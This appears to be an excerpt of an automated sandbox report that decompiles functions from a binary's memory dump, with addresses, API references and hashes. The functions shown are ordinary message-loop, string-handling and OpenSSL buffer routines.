Download Yara Rule

C-Code - Quality: 100%

			E0041FA40(long* __ecx) {
				struct tagMSG _v32;
				long _t9;
				struct HWND__** _t14;

				_t14 = __ecx;
				PostThreadMessageW( *__ecx, 0x12, 0, 0);
				do {
					while(PeekMessageW( &_v32, 0, 0, 0, 1) != 0) {
						DispatchMessageW( &_v32);
					}
					_t9 = WaitForSingleObject(_t14[1], 0xa);
				} while (_t9 == 0x102);
				_t14[1] = 0;
				 *_t14 = 0;
				return _t9;
			}

0x0041fa4b
0x0041fa53
0x0041fa65
0x0041fa75
0x0041fa7b
0x0041fa8b
0x0041fa94
0x0041fa9a
0x0041faa3
0x0041faaa
0x0041fab4

APIs

PostThreadMessageW.USER32 ref: 0041FA53
PeekMessageW.USER32 ref: 0041FA71
DispatchMessageW.USER32 ref: 0041FA7B
PeekMessageW.USER32 ref: 0041FA89
WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0041FA94

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: Message$Peek$DispatchObjectPostSingleThreadWait
String ID:
API String ID: 1380987712-0
Opcode ID: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
Instruction ID: 7dc02704ba958b7d98511173c4623a4fa8f2b4100db45197b38ae147ea501182
Opcode Fuzzy Hash: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
Instruction Fuzzy Hash: 6301AE31B4030577EB205B55DC86FA73B6DDB44B40F544061FB04EE1D1D7F9984587A4

Uniqueness

Uniqueness Score: -1.00%

Function 0041FDF0 Relevance: 7.5, APIs: 5, Instructions: 48
windowsynchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041FDF0(long* __ecx) {
				struct tagMSG _v32;
				long _t9;
				struct HWND__** _t14;

				_t14 = __ecx;
				PostThreadMessageW( *__ecx, 0x12, 0, 0);
				do {
					while(PeekMessageW( &_v32, 0, 0, 0, 1) != 0) {
						DispatchMessageW( &_v32);
					}
					_t9 = WaitForSingleObject(_t14[1], 0xa);
				} while (_t9 == 0x102);
				_t14[1] = 0;
				 *_t14 = 0;
				return _t9;
			}

0x0041fdfb
0x0041fe03
0x0041fe15
0x0041fe25
0x0041fe2b
0x0041fe3b
0x0041fe44
0x0041fe4a
0x0041fe53
0x0041fe5a
0x0041fe64

APIs

PostThreadMessageW.USER32 ref: 0041FE03
PeekMessageW.USER32 ref: 0041FE21
DispatchMessageW.USER32 ref: 0041FE2B
PeekMessageW.USER32 ref: 0041FE39
WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0041FE44

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: Message$Peek$DispatchObjectPostSingleThreadWait
String ID:
API String ID: 1380987712-0
Opcode ID: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
Instruction ID: d705e8d6a79994c6a13c6d22e65b3a6180ae01e64e8e6a22fa5ca061b0d405f5
Opcode Fuzzy Hash: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
Instruction Fuzzy Hash: 3501A931B80308B7EB205B95ED8AF973B6DEB44B00F144061FA04EF1E1D7F5A8468BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00417BA0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 188
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E00417BA0(signed int __ebx, signed int __ecx, signed int _a4, signed int _a8, signed int _a12, signed int _a16) {
				signed int _v0;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v44;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t101;
				signed int _t104;
				signed int _t107;
				signed int _t109;
				signed int _t111;
				signed int _t113;
				signed int _t116;
				intOrPtr _t122;
				intOrPtr _t128;
				intOrPtr* _t136;
				signed int _t137;
				intOrPtr* _t139;
				signed int _t146;
				intOrPtr _t154;
				signed int _t155;
				intOrPtr _t162;
				signed int _t171;
				signed int _t174;
				signed int _t176;
				signed int _t177;
				signed int _t180;
				intOrPtr* _t186;
				signed int _t187;
				signed int _t191;
				intOrPtr _t196;
				signed int _t199;
				signed int _t200;
				intOrPtr _t204;
				signed int _t206;
				intOrPtr* _t207;
				void* _t209;
				signed int _t210;
				intOrPtr* _t211;
				intOrPtr* _t212;
				intOrPtr* _t215;
				void* _t217;
				signed int _t218;
				signed int _t219;
				signed int _t221;
				signed int _t222;
				intOrPtr _t223;
				void* _t224;
				signed int _t233;
				signed int _t238;
				intOrPtr* _t239;
				signed int _t241;
				void* _t250;
				void* _t252;
				void* _t253;

				_t176 = __ebx;
				_push(__ecx);
				_t206 = _a12;
				_t238 = __ecx;
				_push(_t221);
				if(_t206 == 0) {
					L13:
					_t186 =  *((intOrPtr*)(_t238 + 0x10));
					_t101 = _a4;
					__eflags = _t186 - _t101;
					if(__eflags < 0) {
						_push("invalid string position");
						E0044F26C(__eflags);
						goto L46;
					} else {
						_t233 = _a8;
						_t217 = _t186 - _t101;
						__eflags = _t217 - _t233;
						_push(_t176);
						_t176 = _a16;
						_t221 =  <  ? _t217 : _t233;
						_t186 = _t186 - _t221;
						__eflags = (_t101 | 0xffffffff) - _t176 - _t186;
						if(__eflags <= 0) {
							L46:
							_push("string too long");
							E0044F23E(__eflags);
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							_t250 = _t252;
							_t253 = _t252 - 8;
							_push(_t238);
							_push(_t221);
							_t222 = _v12;
							_t239 = _t186;
							__eflags = _t222;
							if(_t222 == 0) {
								L60:
								_t104 =  *(_t239 + 0x10);
								_t187 = _v0;
								__eflags = _t104 - _t187;
								if(__eflags < 0) {
									_push("invalid string position");
									E0044F26C(__eflags);
									goto L91;
								} else {
									_t209 = _t104 - _t187;
									_t187 = _a12;
									_push(_t176);
									_t180 = _a4;
									__eflags = _t209 - _t180;
									_t176 =  <  ? _t209 : _t180;
									_t113 = _t104 - _t176;
									_a4 = _t113;
									__eflags = (_t113 | 0xffffffff) - _t187 - _a4;
									if(__eflags <= 0) {
										L91:
										_push("string too long");
										E0044F23E(__eflags);
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_push(_t250);
										_push(_t176);
										_push(_t239);
										_push(_t222);
										_t223 = _v44;
										__eflags =  *((intOrPtr*)(_t187 + 0x10)) - _t223;
										_t224 =  <  ?  *((void*)(_t187 + 0x10)) : _t223;
										__eflags =  *((intOrPtr*)(_t187 + 0x14)) - 8;
										if( *((intOrPtr*)(_t187 + 0x14)) >= 8) {
											_t187 =  *_t187;
										}
										_t177 = _a8;
										__eflags = _t224 - _t177;
										_t241 =  <  ? _t224 : _t177;
										__eflags = _t241;
										if(_t241 == 0) {
											L98:
											_t107 = 0;
											__eflags = 0;
										} else {
											_t207 = _a4;
											while(1) {
												__eflags =  *_t187 -  *_t207;
												if( *_t187 !=  *_t207) {
													break;
												}
												_t187 = _t187 + 2;
												_t207 = _t207 + 2;
												_t241 = _t241 - 1;
												__eflags = _t241;
												if(_t241 != 0) {
													continue;
												} else {
													goto L98;
												}
												goto L99;
											}
											_t111 =  *_t187 & 0x0000ffff;
											__eflags = _t111 -  *_t207;
											asm("sbb eax, eax");
											_t107 = (_t111 & 0xfffffffe) + 1;
										}
										L99:
										__eflags = _t107;
										if(_t107 != 0) {
											L104:
											return _t107;
										} else {
											__eflags = _t224 - _t177;
											if(_t224 >= _t177) {
												__eflags = _t224 - _t177;
												_t100 = _t224 != _t177;
												__eflags = _t100;
												_t107 = 0 | _t100;
												goto L104;
											} else {
												_t109 = _t107 | 0xffffffff;
												__eflags = _t109;
												return _t109;
											}
										}
									} else {
										_t210 = _t209 - _t176;
										_v16 = _t210;
										__eflags = _t187 - _t176;
										if(_t187 < _t176) {
											_t128 =  *((intOrPtr*)(_t239 + 0x14));
											__eflags = _t128 - 8;
											if(_t128 < 8) {
												_a4 = _t239;
											} else {
												_a4 =  *_t239;
												_t222 = _a8;
											}
											__eflags = _t128 - 8;
											if(_t128 < 8) {
												_v12 = _t239;
											} else {
												_v12 =  *_t239;
											}
											__eflags = _t210;
											if(_t210 != 0) {
												E004205A0(_v12 + (_v0 + _t187) * 2, _a4 + (_v0 + _t176) * 2, _t210 + _t210);
												_t222 = _a8;
												_t253 = _t253 + 0xc;
												_t187 = _a12;
											}
										}
										__eflags = _t187;
										if(_t187 != 0) {
											L73:
											_a4 = _t187 - _t176 +  *(_t239 + 0x10);
											_t116 = E00415D50(_t176, _t239, _t222, _t239, _t187 - _t176 +  *(_t239 + 0x10), 0);
											__eflags = _t116;
											if(_t116 != 0) {
												_t191 = _a12;
												__eflags = _t176 - _t191;
												if(_t176 >= _t191) {
													_t182 = _v0;
												} else {
													_t122 =  *((intOrPtr*)(_t239 + 0x14));
													__eflags = _t122 - 8;
													if(_t122 < 8) {
														_t212 = _t239;
													} else {
														_t212 =  *_t239;
													}
													__eflags = _t122 - 8;
													if(_t122 < 8) {
														_a8 = _t239;
													} else {
														_a8 =  *_t239;
													}
													_t182 = _v0;
													E0040B600(_a8 + (_v0 + _t191) * 2, _t212 + (_v0 + _t176) * 2, _v16);
													_t191 = _a12;
													_t253 = _t253 + 4;
												}
												__eflags =  *((intOrPtr*)(_t239 + 0x14)) - 8;
												if( *((intOrPtr*)(_t239 + 0x14)) < 8) {
													_t211 = _t239;
												} else {
													_t211 =  *_t239;
												}
												__eflags = _t191;
												if(_t191 != 0) {
													E0042D8D0(_t211 + _t182 * 2, _t222, _t191 + _t191);
												}
												E00414DF0(_t239, _a4);
											}
										} else {
											__eflags = _t176;
											if(_t176 != 0) {
												goto L73;
											}
										}
										return _t239;
									}
								}
							} else {
								_t196 =  *((intOrPtr*)(_t239 + 0x14));
								__eflags = _t196 - 8;
								if(_t196 < 8) {
									_t136 = _t239;
								} else {
									_t136 =  *_t239;
								}
								__eflags = _t222 - _t136;
								if(_t222 < _t136) {
									goto L60;
								} else {
									__eflags = _t196 - 8;
									if(_t196 < 8) {
										_t215 = _t239;
									} else {
										_t215 =  *_t239;
									}
									_t137 =  *(_t239 + 0x10);
									__eflags = _t215 + _t137 * 2 - _t222;
									if(_t215 + _t137 * 2 <= _t222) {
										goto L60;
									} else {
										__eflags = _t196 - 8;
										if(_t196 < 8) {
											_t139 = _t239;
										} else {
											_t139 =  *_t239;
										}
										__eflags = _t222 - _t139;
										return E00414920(_t176, _t239, _t222 - _t139 >> 1, _t239, _v0, _a4, _t239, _t222 - _t139 >> 1, _a12);
									}
								}
							}
						} else {
							_t218 = _t217 - _t221;
							_v8 = _t218;
							__eflags = _t176 - _t221;
							if(_t176 < _t221) {
								_t162 =  *((intOrPtr*)(_t238 + 0x14));
								__eflags = _t162 - 0x10;
								if(_t162 < 0x10) {
									_a8 = _t238;
								} else {
									_a8 =  *_t238;
								}
								__eflags = _t162 - 0x10;
								if(_t162 < 0x10) {
									_a16 = _t238;
								} else {
									_a16 =  *_t238;
								}
								__eflags = _t218;
								if(_t218 != 0) {
									__eflags = _a16 + _a4 + _t176;
									E004205A0(_a16 + _a4 + _t176, _a8 + _a4 + _t221, _t218);
									_t252 = _t252 + 0xc;
								}
							}
							__eflags = _t176;
							if(_t176 != 0) {
								L26:
								_push(0);
								_a16 = _t176 - _t221 +  *((intOrPtr*)(_t238 + 0x10));
								_t146 = E00415810(_t176, _t238, _t221, _t176 - _t221 +  *((intOrPtr*)(_t238 + 0x10)));
								__eflags = _t146;
								if(_t146 == 0) {
									goto L44;
								} else {
									__eflags = _t221 - _t176;
									if(_t221 < _t176) {
										_t154 =  *((intOrPtr*)(_t238 + 0x14));
										__eflags = _t154 - 0x10;
										if(_t154 < 0x10) {
											_a8 = _t238;
										} else {
											_a8 =  *_t238;
										}
										__eflags = _t154 - 0x10;
										if(_t154 < 0x10) {
											_t219 = _t238;
										} else {
											_t219 =  *_t238;
										}
										_t155 = _v8;
										__eflags = _t155;
										if(_t155 != 0) {
											__eflags = _t219 + _a4 + _t176;
											E004205A0(_t219 + _a4 + _t176, _a8 + _a4 + _t221, _t155);
											_t252 = _t252 + 0xc;
										}
									}
									__eflags =  *((intOrPtr*)(_t238 + 0x14)) - 0x10;
									if( *((intOrPtr*)(_t238 + 0x14)) < 0x10) {
										_t199 = _t238;
									} else {
										_t199 =  *_t238;
									}
									__eflags = _t176;
									if(_t176 != 0) {
										__eflags = _a4 + _t199;
										E0042D8D0(_a4 + _t199, _a12, _t176);
									}
									__eflags =  *((intOrPtr*)(_t238 + 0x14)) - 0x10;
									_t200 = _a16;
									 *((intOrPtr*)(_t238 + 0x10)) = _t200;
									if( *((intOrPtr*)(_t238 + 0x14)) < 0x10) {
										 *((char*)(_t238 + _t200)) = 0;
										goto L44;
									} else {
										 *((char*)( *_t238 + _t200)) = 0;
										return _t238;
									}
								}
							} else {
								__eflags = _t221;
								if(_t221 == 0) {
									L44:
									return _t238;
								} else {
									goto L26;
								}
							}
						}
					}
				} else {
					_t204 =  *((intOrPtr*)(__ecx + 0x14));
					if(_t204 < 0x10) {
						_t171 = __ecx;
					} else {
						_t171 =  *((intOrPtr*)(__ecx));
					}
					if(_t206 < _t171) {
						goto L13;
					} else {
						if(_t204 < 0x10) {
							_t221 = _t238;
						} else {
							_t221 =  *_t238;
						}
						if( *((intOrPtr*)(_t238 + 0x10)) + _t221 <= _t206) {
							goto L13;
						} else {
							if(_t204 < 0x10) {
								_t174 = _t238;
							} else {
								_t174 =  *_t238;
							}
							return E00418000(_t176, _t238, _t221, _t238, _a4, _a8, _t238, _t206 - _t174, _a16);
						}
					}
				}
			}

0x00417ba0
0x00417ba3
0x00417ba4
0x00417ba8
0x00417baa
0x00417bad
0x00417bfc
0x00417bfc
0x00417bff
0x00417c02
0x00417c04
0x00417d2c
0x00417d31
0x00000000
0x00417c0a
0x00417c0a
0x00417c0f
0x00417c11
0x00417c13
0x00417c14
0x00417c17
0x00417c1d
0x00417c21
0x00417c23
0x00417d36
0x00417d36
0x00417d3b
0x00417d40
0x00417d41
0x00417d42
0x00417d43
0x00417d44
0x00417d45
0x00417d46
0x00417d47
0x00417d48
0x00417d49
0x00417d4a
0x00417d4b
0x00417d4c
0x00417d4d
0x00417d4e
0x00417d4f
0x00417d51
0x00417d53
0x00417d56
0x00417d57
0x00417d58
0x00417d5b
0x00417d5d
0x00417d5f
0x00417db1
0x00417db1
0x00417db4
0x00417db7
0x00417db9
0x00417edf
0x00417ee4
0x00000000
0x00417dbf
0x00417dc1
0x00417dc3
0x00417dc6
0x00417dc7
0x00417dca
0x00417dcc
0x00417dcf
0x00417dd1
0x00417dd9
0x00417ddc
0x00417ee9
0x00417ee9
0x00417eee
0x00417ef3
0x00417ef4
0x00417ef5
0x00417ef6
0x00417ef7
0x00417ef8
0x00417ef9
0x00417efa
0x00417efb
0x00417efc
0x00417efd
0x00417efe
0x00417eff
0x00417f00
0x00417f03
0x00417f04
0x00417f05
0x00417f06
0x00417f09
0x00417f0c
0x00417f10
0x00417f14
0x00417f16
0x00417f16
0x00417f18
0x00417f1b
0x00417f1f
0x00417f22
0x00417f24
0x00417f41
0x00417f41
0x00417f41
0x00417f26
0x00417f26
0x00417f30
0x00417f33
0x00417f36
0x00000000
0x00000000
0x00417f38
0x00417f3b
0x00417f3e
0x00417f3e
0x00417f3f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00417f3f
0x00417f55
0x00417f58
0x00417f5b
0x00417f60
0x00417f60
0x00417f43
0x00417f43
0x00417f45
0x00417f6a
0x00417f6e
0x00417f47
0x00417f47
0x00417f49
0x00417f65
0x00417f67
0x00417f67
0x00417f67
0x00000000
0x00417f4b
0x00417f4d
0x00417f4d
0x00417f52
0x00417f52
0x00417f49
0x00417de2
0x00417de2
0x00417de4
0x00417de7
0x00417de9
0x00417deb
0x00417dee
0x00417df1
0x00417dfd
0x00417df3
0x00417df5
0x00417df8
0x00417df8
0x00417e00
0x00417e03
0x00417e0c
0x00417e05
0x00417e07
0x00417e07
0x00417e0f
0x00417e11
0x00417e2e
0x00417e33
0x00417e36
0x00417e39
0x00417e39
0x00417e11
0x00417e3c
0x00417e3e
0x00417e48
0x00417e4f
0x00417e55
0x00417e5a
0x00417e5c
0x00417e5e
0x00417e61
0x00417e63
0x00417ea6
0x00417e65
0x00417e65
0x00417e68
0x00417e6b
0x00417e71
0x00417e6d
0x00417e6d
0x00417e6d
0x00417e73
0x00417e76
0x00417e7f
0x00417e78
0x00417e7a
0x00417e7a
0x00417e8a
0x00417e99
0x00417e9e
0x00417ea1
0x00417ea1
0x00417ea9
0x00417ead
0x00417eb3
0x00417eaf
0x00417eaf
0x00417eaf
0x00417eb5
0x00417eb7
0x00417ec2
0x00417ec7
0x00417ecf
0x00417ecf
0x00417e40
0x00417e40
0x00417e42
0x00000000
0x00000000
0x00417e42
0x00417edc
0x00417edc
0x00417ddc
0x00417d61
0x00417d61
0x00417d64
0x00417d67
0x00417d6d
0x00417d69
0x00417d69
0x00417d69
0x00417d6f
0x00417d71
0x00000000
0x00417d73
0x00417d73
0x00417d76
0x00417d7c
0x00417d78
0x00417d78
0x00417d78
0x00417d7e
0x00417d84
0x00417d86
0x00000000
0x00417d88
0x00417d88
0x00417d8b
0x00417d91
0x00417d8d
0x00417d8d
0x00417d8d
0x00417d96
0x00417dae
0x00417dae
0x00417d86
0x00417d71
0x00417c29
0x00417c29
0x00417c2b
0x00417c2e
0x00417c30
0x00417c32
0x00417c35
0x00417c38
0x00417c41
0x00417c3a
0x00417c3c
0x00417c3c
0x00417c44
0x00417c47
0x00417c50
0x00417c49
0x00417c4b
0x00417c4b
0x00417c53
0x00417c55
0x00417c67
0x00417c6a
0x00417c6f
0x00417c6f
0x00417c55
0x00417c72
0x00417c74
0x00417c7e
0x00417c87
0x00417c8a
0x00417c8d
0x00417c92
0x00417c94
0x00000000
0x00417c9a
0x00417c9a
0x00417c9c
0x00417c9e
0x00417ca1
0x00417ca4
0x00417cad
0x00417ca6
0x00417ca8
0x00417ca8
0x00417cb0
0x00417cb3
0x00417cb9
0x00417cb5
0x00417cb5
0x00417cb5
0x00417cbb
0x00417cbe
0x00417cc0
0x00417cd1
0x00417cd4
0x00417cd9
0x00417cd9
0x00417cc0
0x00417cdc
0x00417ce0
0x00417ce6
0x00417ce2
0x00417ce2
0x00417ce2
0x00417ce8
0x00417cea
0x00417cf3
0x00417cf6
0x00417cfb
0x00417cfe
0x00417d02
0x00417d05
0x00417d08
0x00417d1d
0x00000000
0x00417d0a
0x00417d0e
0x00417d18
0x00417d18
0x00417d08
0x00417c76
0x00417c76
0x00417c78
0x00417d21
0x00417d29
0x00000000
0x00000000
0x00000000
0x00417c78
0x00417c74
0x00417c23
0x00417baf
0x00417baf
0x00417bb5
0x00417bbb
0x00417bb7
0x00417bb7
0x00417bb7
0x00417bbf
0x00000000
0x00417bc1
0x00417bc4
0x00417bca
0x00417bc6
0x00417bc6
0x00417bc6
0x00417bd3
0x00000000
0x00417bd5
0x00417bd8
0x00417bde
0x00417bda
0x00417bda
0x00417bda
0x00417bf9
0x00417bf9
0x00417bd3
0x00417bbf

APIs

_memmove.LIBCMT ref: 00417C6A
_memmove.LIBCMT ref: 00417CD4

Strings

invalid string position, xrefs: 00417D2C
string too long, xrefs: 00417D36

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: invalid string position$string too long
API String ID: 4104443479-4289949731
Opcode ID: b2c1af29de5962b74b57e5661815869f54c56e8a90a0ab9c91a19098a667a223
Instruction ID: 16eedd03d570a769cf24423414cb71a1906862ef28ca1dd771941f38c47b8a04
Opcode Fuzzy Hash: b2c1af29de5962b74b57e5661815869f54c56e8a90a0ab9c91a19098a667a223
Instruction Fuzzy Hash: C451C3317081089BDB24CE1CD980AAA77B6EF85714B24891FF856CB381DB35EDD18BD9

Uniqueness

Uniqueness Score: -1.00%

Function 00414160 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00414160(signed int __eax, void* __ebx, intOrPtr* __ecx, signed int __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				intOrPtr* _v20;
				void* __ebp;
				intOrPtr* _t24;
				intOrPtr _t31;
				intOrPtr* _t34;
				intOrPtr _t38;
				intOrPtr* _t39;
				intOrPtr* _t48;
				intOrPtr* _t51;
				intOrPtr _t53;
				intOrPtr* _t56;
				intOrPtr* _t57;
				signed int _t59;
				void* _t60;
				intOrPtr* _t63;
				void* _t67;

				_push(__ecx);
				_push(__ebx);
				_t63 = __ecx;
				_push(__edi);
				_t59 = __edi | 0xffffffff;
				_t51 =  *((intOrPtr*)(__ecx + 0x10));
				if(_t51 < _a4) {
					L32:
					_push("invalid string position");
					E0044F26C(__eflags);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					__eflags =  *((intOrPtr*)(_t51 + 0x14)) - 0x10;
					_t24 = _v20;
					if( *((intOrPtr*)(_t51 + 0x14)) >= 0x10) {
						_t51 =  *_t51;
					}
					 *_t24 = _t51;
					return _t24;
				} else {
					_t48 = _a8;
					_t5 = _t48 + 0x10; // 0xcccccccc
					_t60 =  <  ?  *_t5 : _t59;
					if((__eax | 0xffffffff) - _t51 <= _t60) {
						_push("string too long");
						E0044F23E(__eflags);
						goto L32;
					} else {
						if(_t60 != 0) {
							_push(0);
							_v8 = _t51 + _t60;
							if(E00415810(_t48, __ecx, _t60, _t51 + _t60) != 0) {
								_t31 =  *((intOrPtr*)(__ecx + 0x14));
								if(_t31 < 0x10) {
									_a8 = __ecx;
								} else {
									_a8 =  *__ecx;
								}
								if(_t31 < 0x10) {
									_t56 = _t63;
								} else {
									_t56 =  *_t63;
								}
								_t53 = _a4;
								_t33 =  *((intOrPtr*)(_t63 + 0x10)) != _t53;
								if( *((intOrPtr*)(_t63 + 0x10)) != _t53) {
									E004205A0(_t56 + _t53 + _t60, _a8 + _t53, _t33);
									_t53 = _a4;
									_t67 = _t67 + 0xc;
								}
								if(_t63 != _t48) {
									__eflags =  *((intOrPtr*)(_t48 + 0x14)) - 0x10;
									if( *((intOrPtr*)(_t48 + 0x14)) >= 0x10) {
										_t48 =  *_t48;
									}
									__eflags =  *((intOrPtr*)(_t63 + 0x14)) - 0x10;
									if( *((intOrPtr*)(_t63 + 0x14)) < 0x10) {
										_t34 = _t63;
									} else {
										_t34 =  *_t63;
									}
									__eflags = _t60;
									if(_t60 != 0) {
										__eflags = _t34 + _t53;
										E0042D8D0(_t34 + _t53, _t48, _t60);
										goto L28;
									}
								} else {
									_t38 =  *((intOrPtr*)(_t63 + 0x14));
									if(_t38 < 0x10) {
										_t57 = _t63;
									} else {
										_t57 =  *_t63;
									}
									if(_t38 < 0x10) {
										_t39 = _t63;
									} else {
										_t39 =  *_t63;
									}
									if(_t60 != 0) {
										E004205A0(_t39 + _t53, _t57, _t60);
										L28:
									}
								}
								E00414460(_t63, _v8);
							}
						}
						return _t63;
					}
				}
			}

0x00414163
0x00414164
0x00414166
0x00414168
0x00414169
0x0041416c
0x00414172
0x00414260
0x00414260
0x00414265
0x0041426a
0x0041426b
0x0041426c
0x0041426d
0x0041426e
0x0041426f
0x00414273
0x00414277
0x0041427a
0x0041427c
0x0041427c
0x0041427e
0x00414281
0x00414178
0x00414178
0x0041417f
0x0041417f
0x0041418a
0x00414256
0x0041425b
0x00000000
0x00414190
0x00414192
0x0041419d
0x004141a0
0x004141aa
0x004141b0
0x004141b6
0x004141bf
0x004141b8
0x004141ba
0x004141ba
0x004141c5
0x004141cb
0x004141c7
0x004141c7
0x004141c7
0x004141d0
0x004141d3
0x004141d5
0x004141e4
0x004141e9
0x004141ec
0x004141ec
0x004141f1
0x0041421c
0x00414220
0x00414222
0x00414222
0x00414224
0x00414228
0x0041422e
0x0041422a
0x0041422a
0x0041422a
0x00414230
0x00414232
0x00414235
0x00414239
0x00000000
0x00414239
0x004141f3
0x004141f3
0x004141f9
0x004141ff
0x004141fb
0x004141fb
0x004141fb
0x00414204
0x0041420a
0x00414206
0x00414206
0x00414206
0x0041420e
0x00414215
0x0041423e
0x0041423e
0x0041420e
0x00414246
0x00414246
0x004141aa
0x00414253
0x00414253
0x0041418a

APIs

_memmove.LIBCMT ref: 004141E4
_memmove.LIBCMT ref: 00414215

Strings

invalid string position, xrefs: 00414260
string too long, xrefs: 00414256

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: invalid string position$string too long
API String ID: 4104443479-4289949731
Opcode ID: 1860cadd0784f8812835e732d2f60387060861baec5cac242feb419a09eb11c6
Instruction ID: c789d4a5c221ce0c411dffae1b259be01e75b302f83ceaf2f45b858c9c7e4579
Opcode Fuzzy Hash: 1860cadd0784f8812835e732d2f60387060861baec5cac242feb419a09eb11c6
Instruction Fuzzy Hash: 3D311430300204ABDB28DE5CD8859AA77B6EFC17507600A5EF865CB381D739EDC18BAD

Uniqueness

Uniqueness Score: -1.00%

Function 0045AD50 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 91
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 96%

			E0045AD50(void* __ebx, void* __edx, void* __ebp, char _a4, char _a8) {
				void* __edi;
				intOrPtr _t17;
				intOrPtr _t18;
				signed int _t36;
				intOrPtr _t44;
				intOrPtr* _t45;
				intOrPtr _t46;

				_t48 = __ebp;
				_t1 =  &_a8; // 0x463743
				_t46 =  *_t1;
				_t2 =  &_a4; // 0x463743
				_t45 =  *_t2;
				_t39 =  *_t45;
				if( *_t45 >= _t46) {
					L3:
					 *_t45 = _t46;
					return _t46;
				} else {
					if( *(_t45 + 8) < _t46) {
						__eflags = _t46 - 0x5ffffffc;
						if(__eflags <= 0) {
							_t17 =  *((intOrPtr*)(_t45 + 4));
							_push(__ebx);
							_t36 = 0xaaaaaaab * (_t46 + 3) >> 0x20 >> 1 << 2;
							__eflags = _t17;
							if(_t17 != 0) {
								_t18 = E00454F30(_t17, _t36, ".\\crypto\\buffer\\buffer.c", 0x7b);
							} else {
								_t18 = E00454E50(_t36, ".\\crypto\\buffer\\buffer.c", 0x79);
							}
							_t44 = _t18;
							__eflags = _t44;
							if(__eflags != 0) {
								__eflags = _t46 -  *_t45;
								 *((intOrPtr*)(_t45 + 4)) = _t44;
								 *(_t45 + 8) = _t36;
								E0042B420( *_t45 + _t44, 0, _t46 -  *_t45);
								 *_t45 = _t46;
								return _t46;
							} else {
								E004512D0(_t36, _t44, _t45, _t48, __eflags, 7, 0x64, 0x41, ".\\crypto\\buffer\\buffer.c", 0x7e);
								__eflags = 0;
								return 0;
							}
						} else {
							E004512D0(__ebx, __edx, _t45, __ebp, __eflags, 7, 0x64, 0x41, ".\\crypto\\buffer\\buffer.c", 0x74);
							__eflags = 0;
							return 0;
						}
					} else {
						E0042B420( *((intOrPtr*)(_t45 + 4)) + _t39, 0, _t46 - _t39);
						goto L3;
					}
				}
			}

0x0045ad50
0x0045ad51
0x0045ad51
0x0045ad56
0x0045ad56
0x0045ad5a
0x0045ad5e
0x0045ad7a
0x0045ad7a
0x0045ad80
0x0045ad60
0x0045ad63
0x0045ad81
0x0045ad87
0x0045adad
0x0045adb0
0x0045adb5
0x0045adb8
0x0045adba
0x0045add7
0x0045adbc
0x0045adc4
0x0045adc9
0x0045addf
0x0045ade1
0x0045ade3
0x0045ae06
0x0045ae08
0x0045ae11
0x0045ae15
0x0045ae1d
0x0045ae24
0x0045ade5
0x0045adf2
0x0045adfa
0x0045ae01
0x0045ae01
0x0045ad89
0x0045ad96
0x0045ad9e
0x0045ada2
0x0045ada2
0x0045ad65
0x0045ad72
0x00000000
0x0045ad77
0x0045ad63

APIs

_memset.LIBCMT ref: 0045AD72
_memset.LIBCMT ref: 0045AE15

Strings

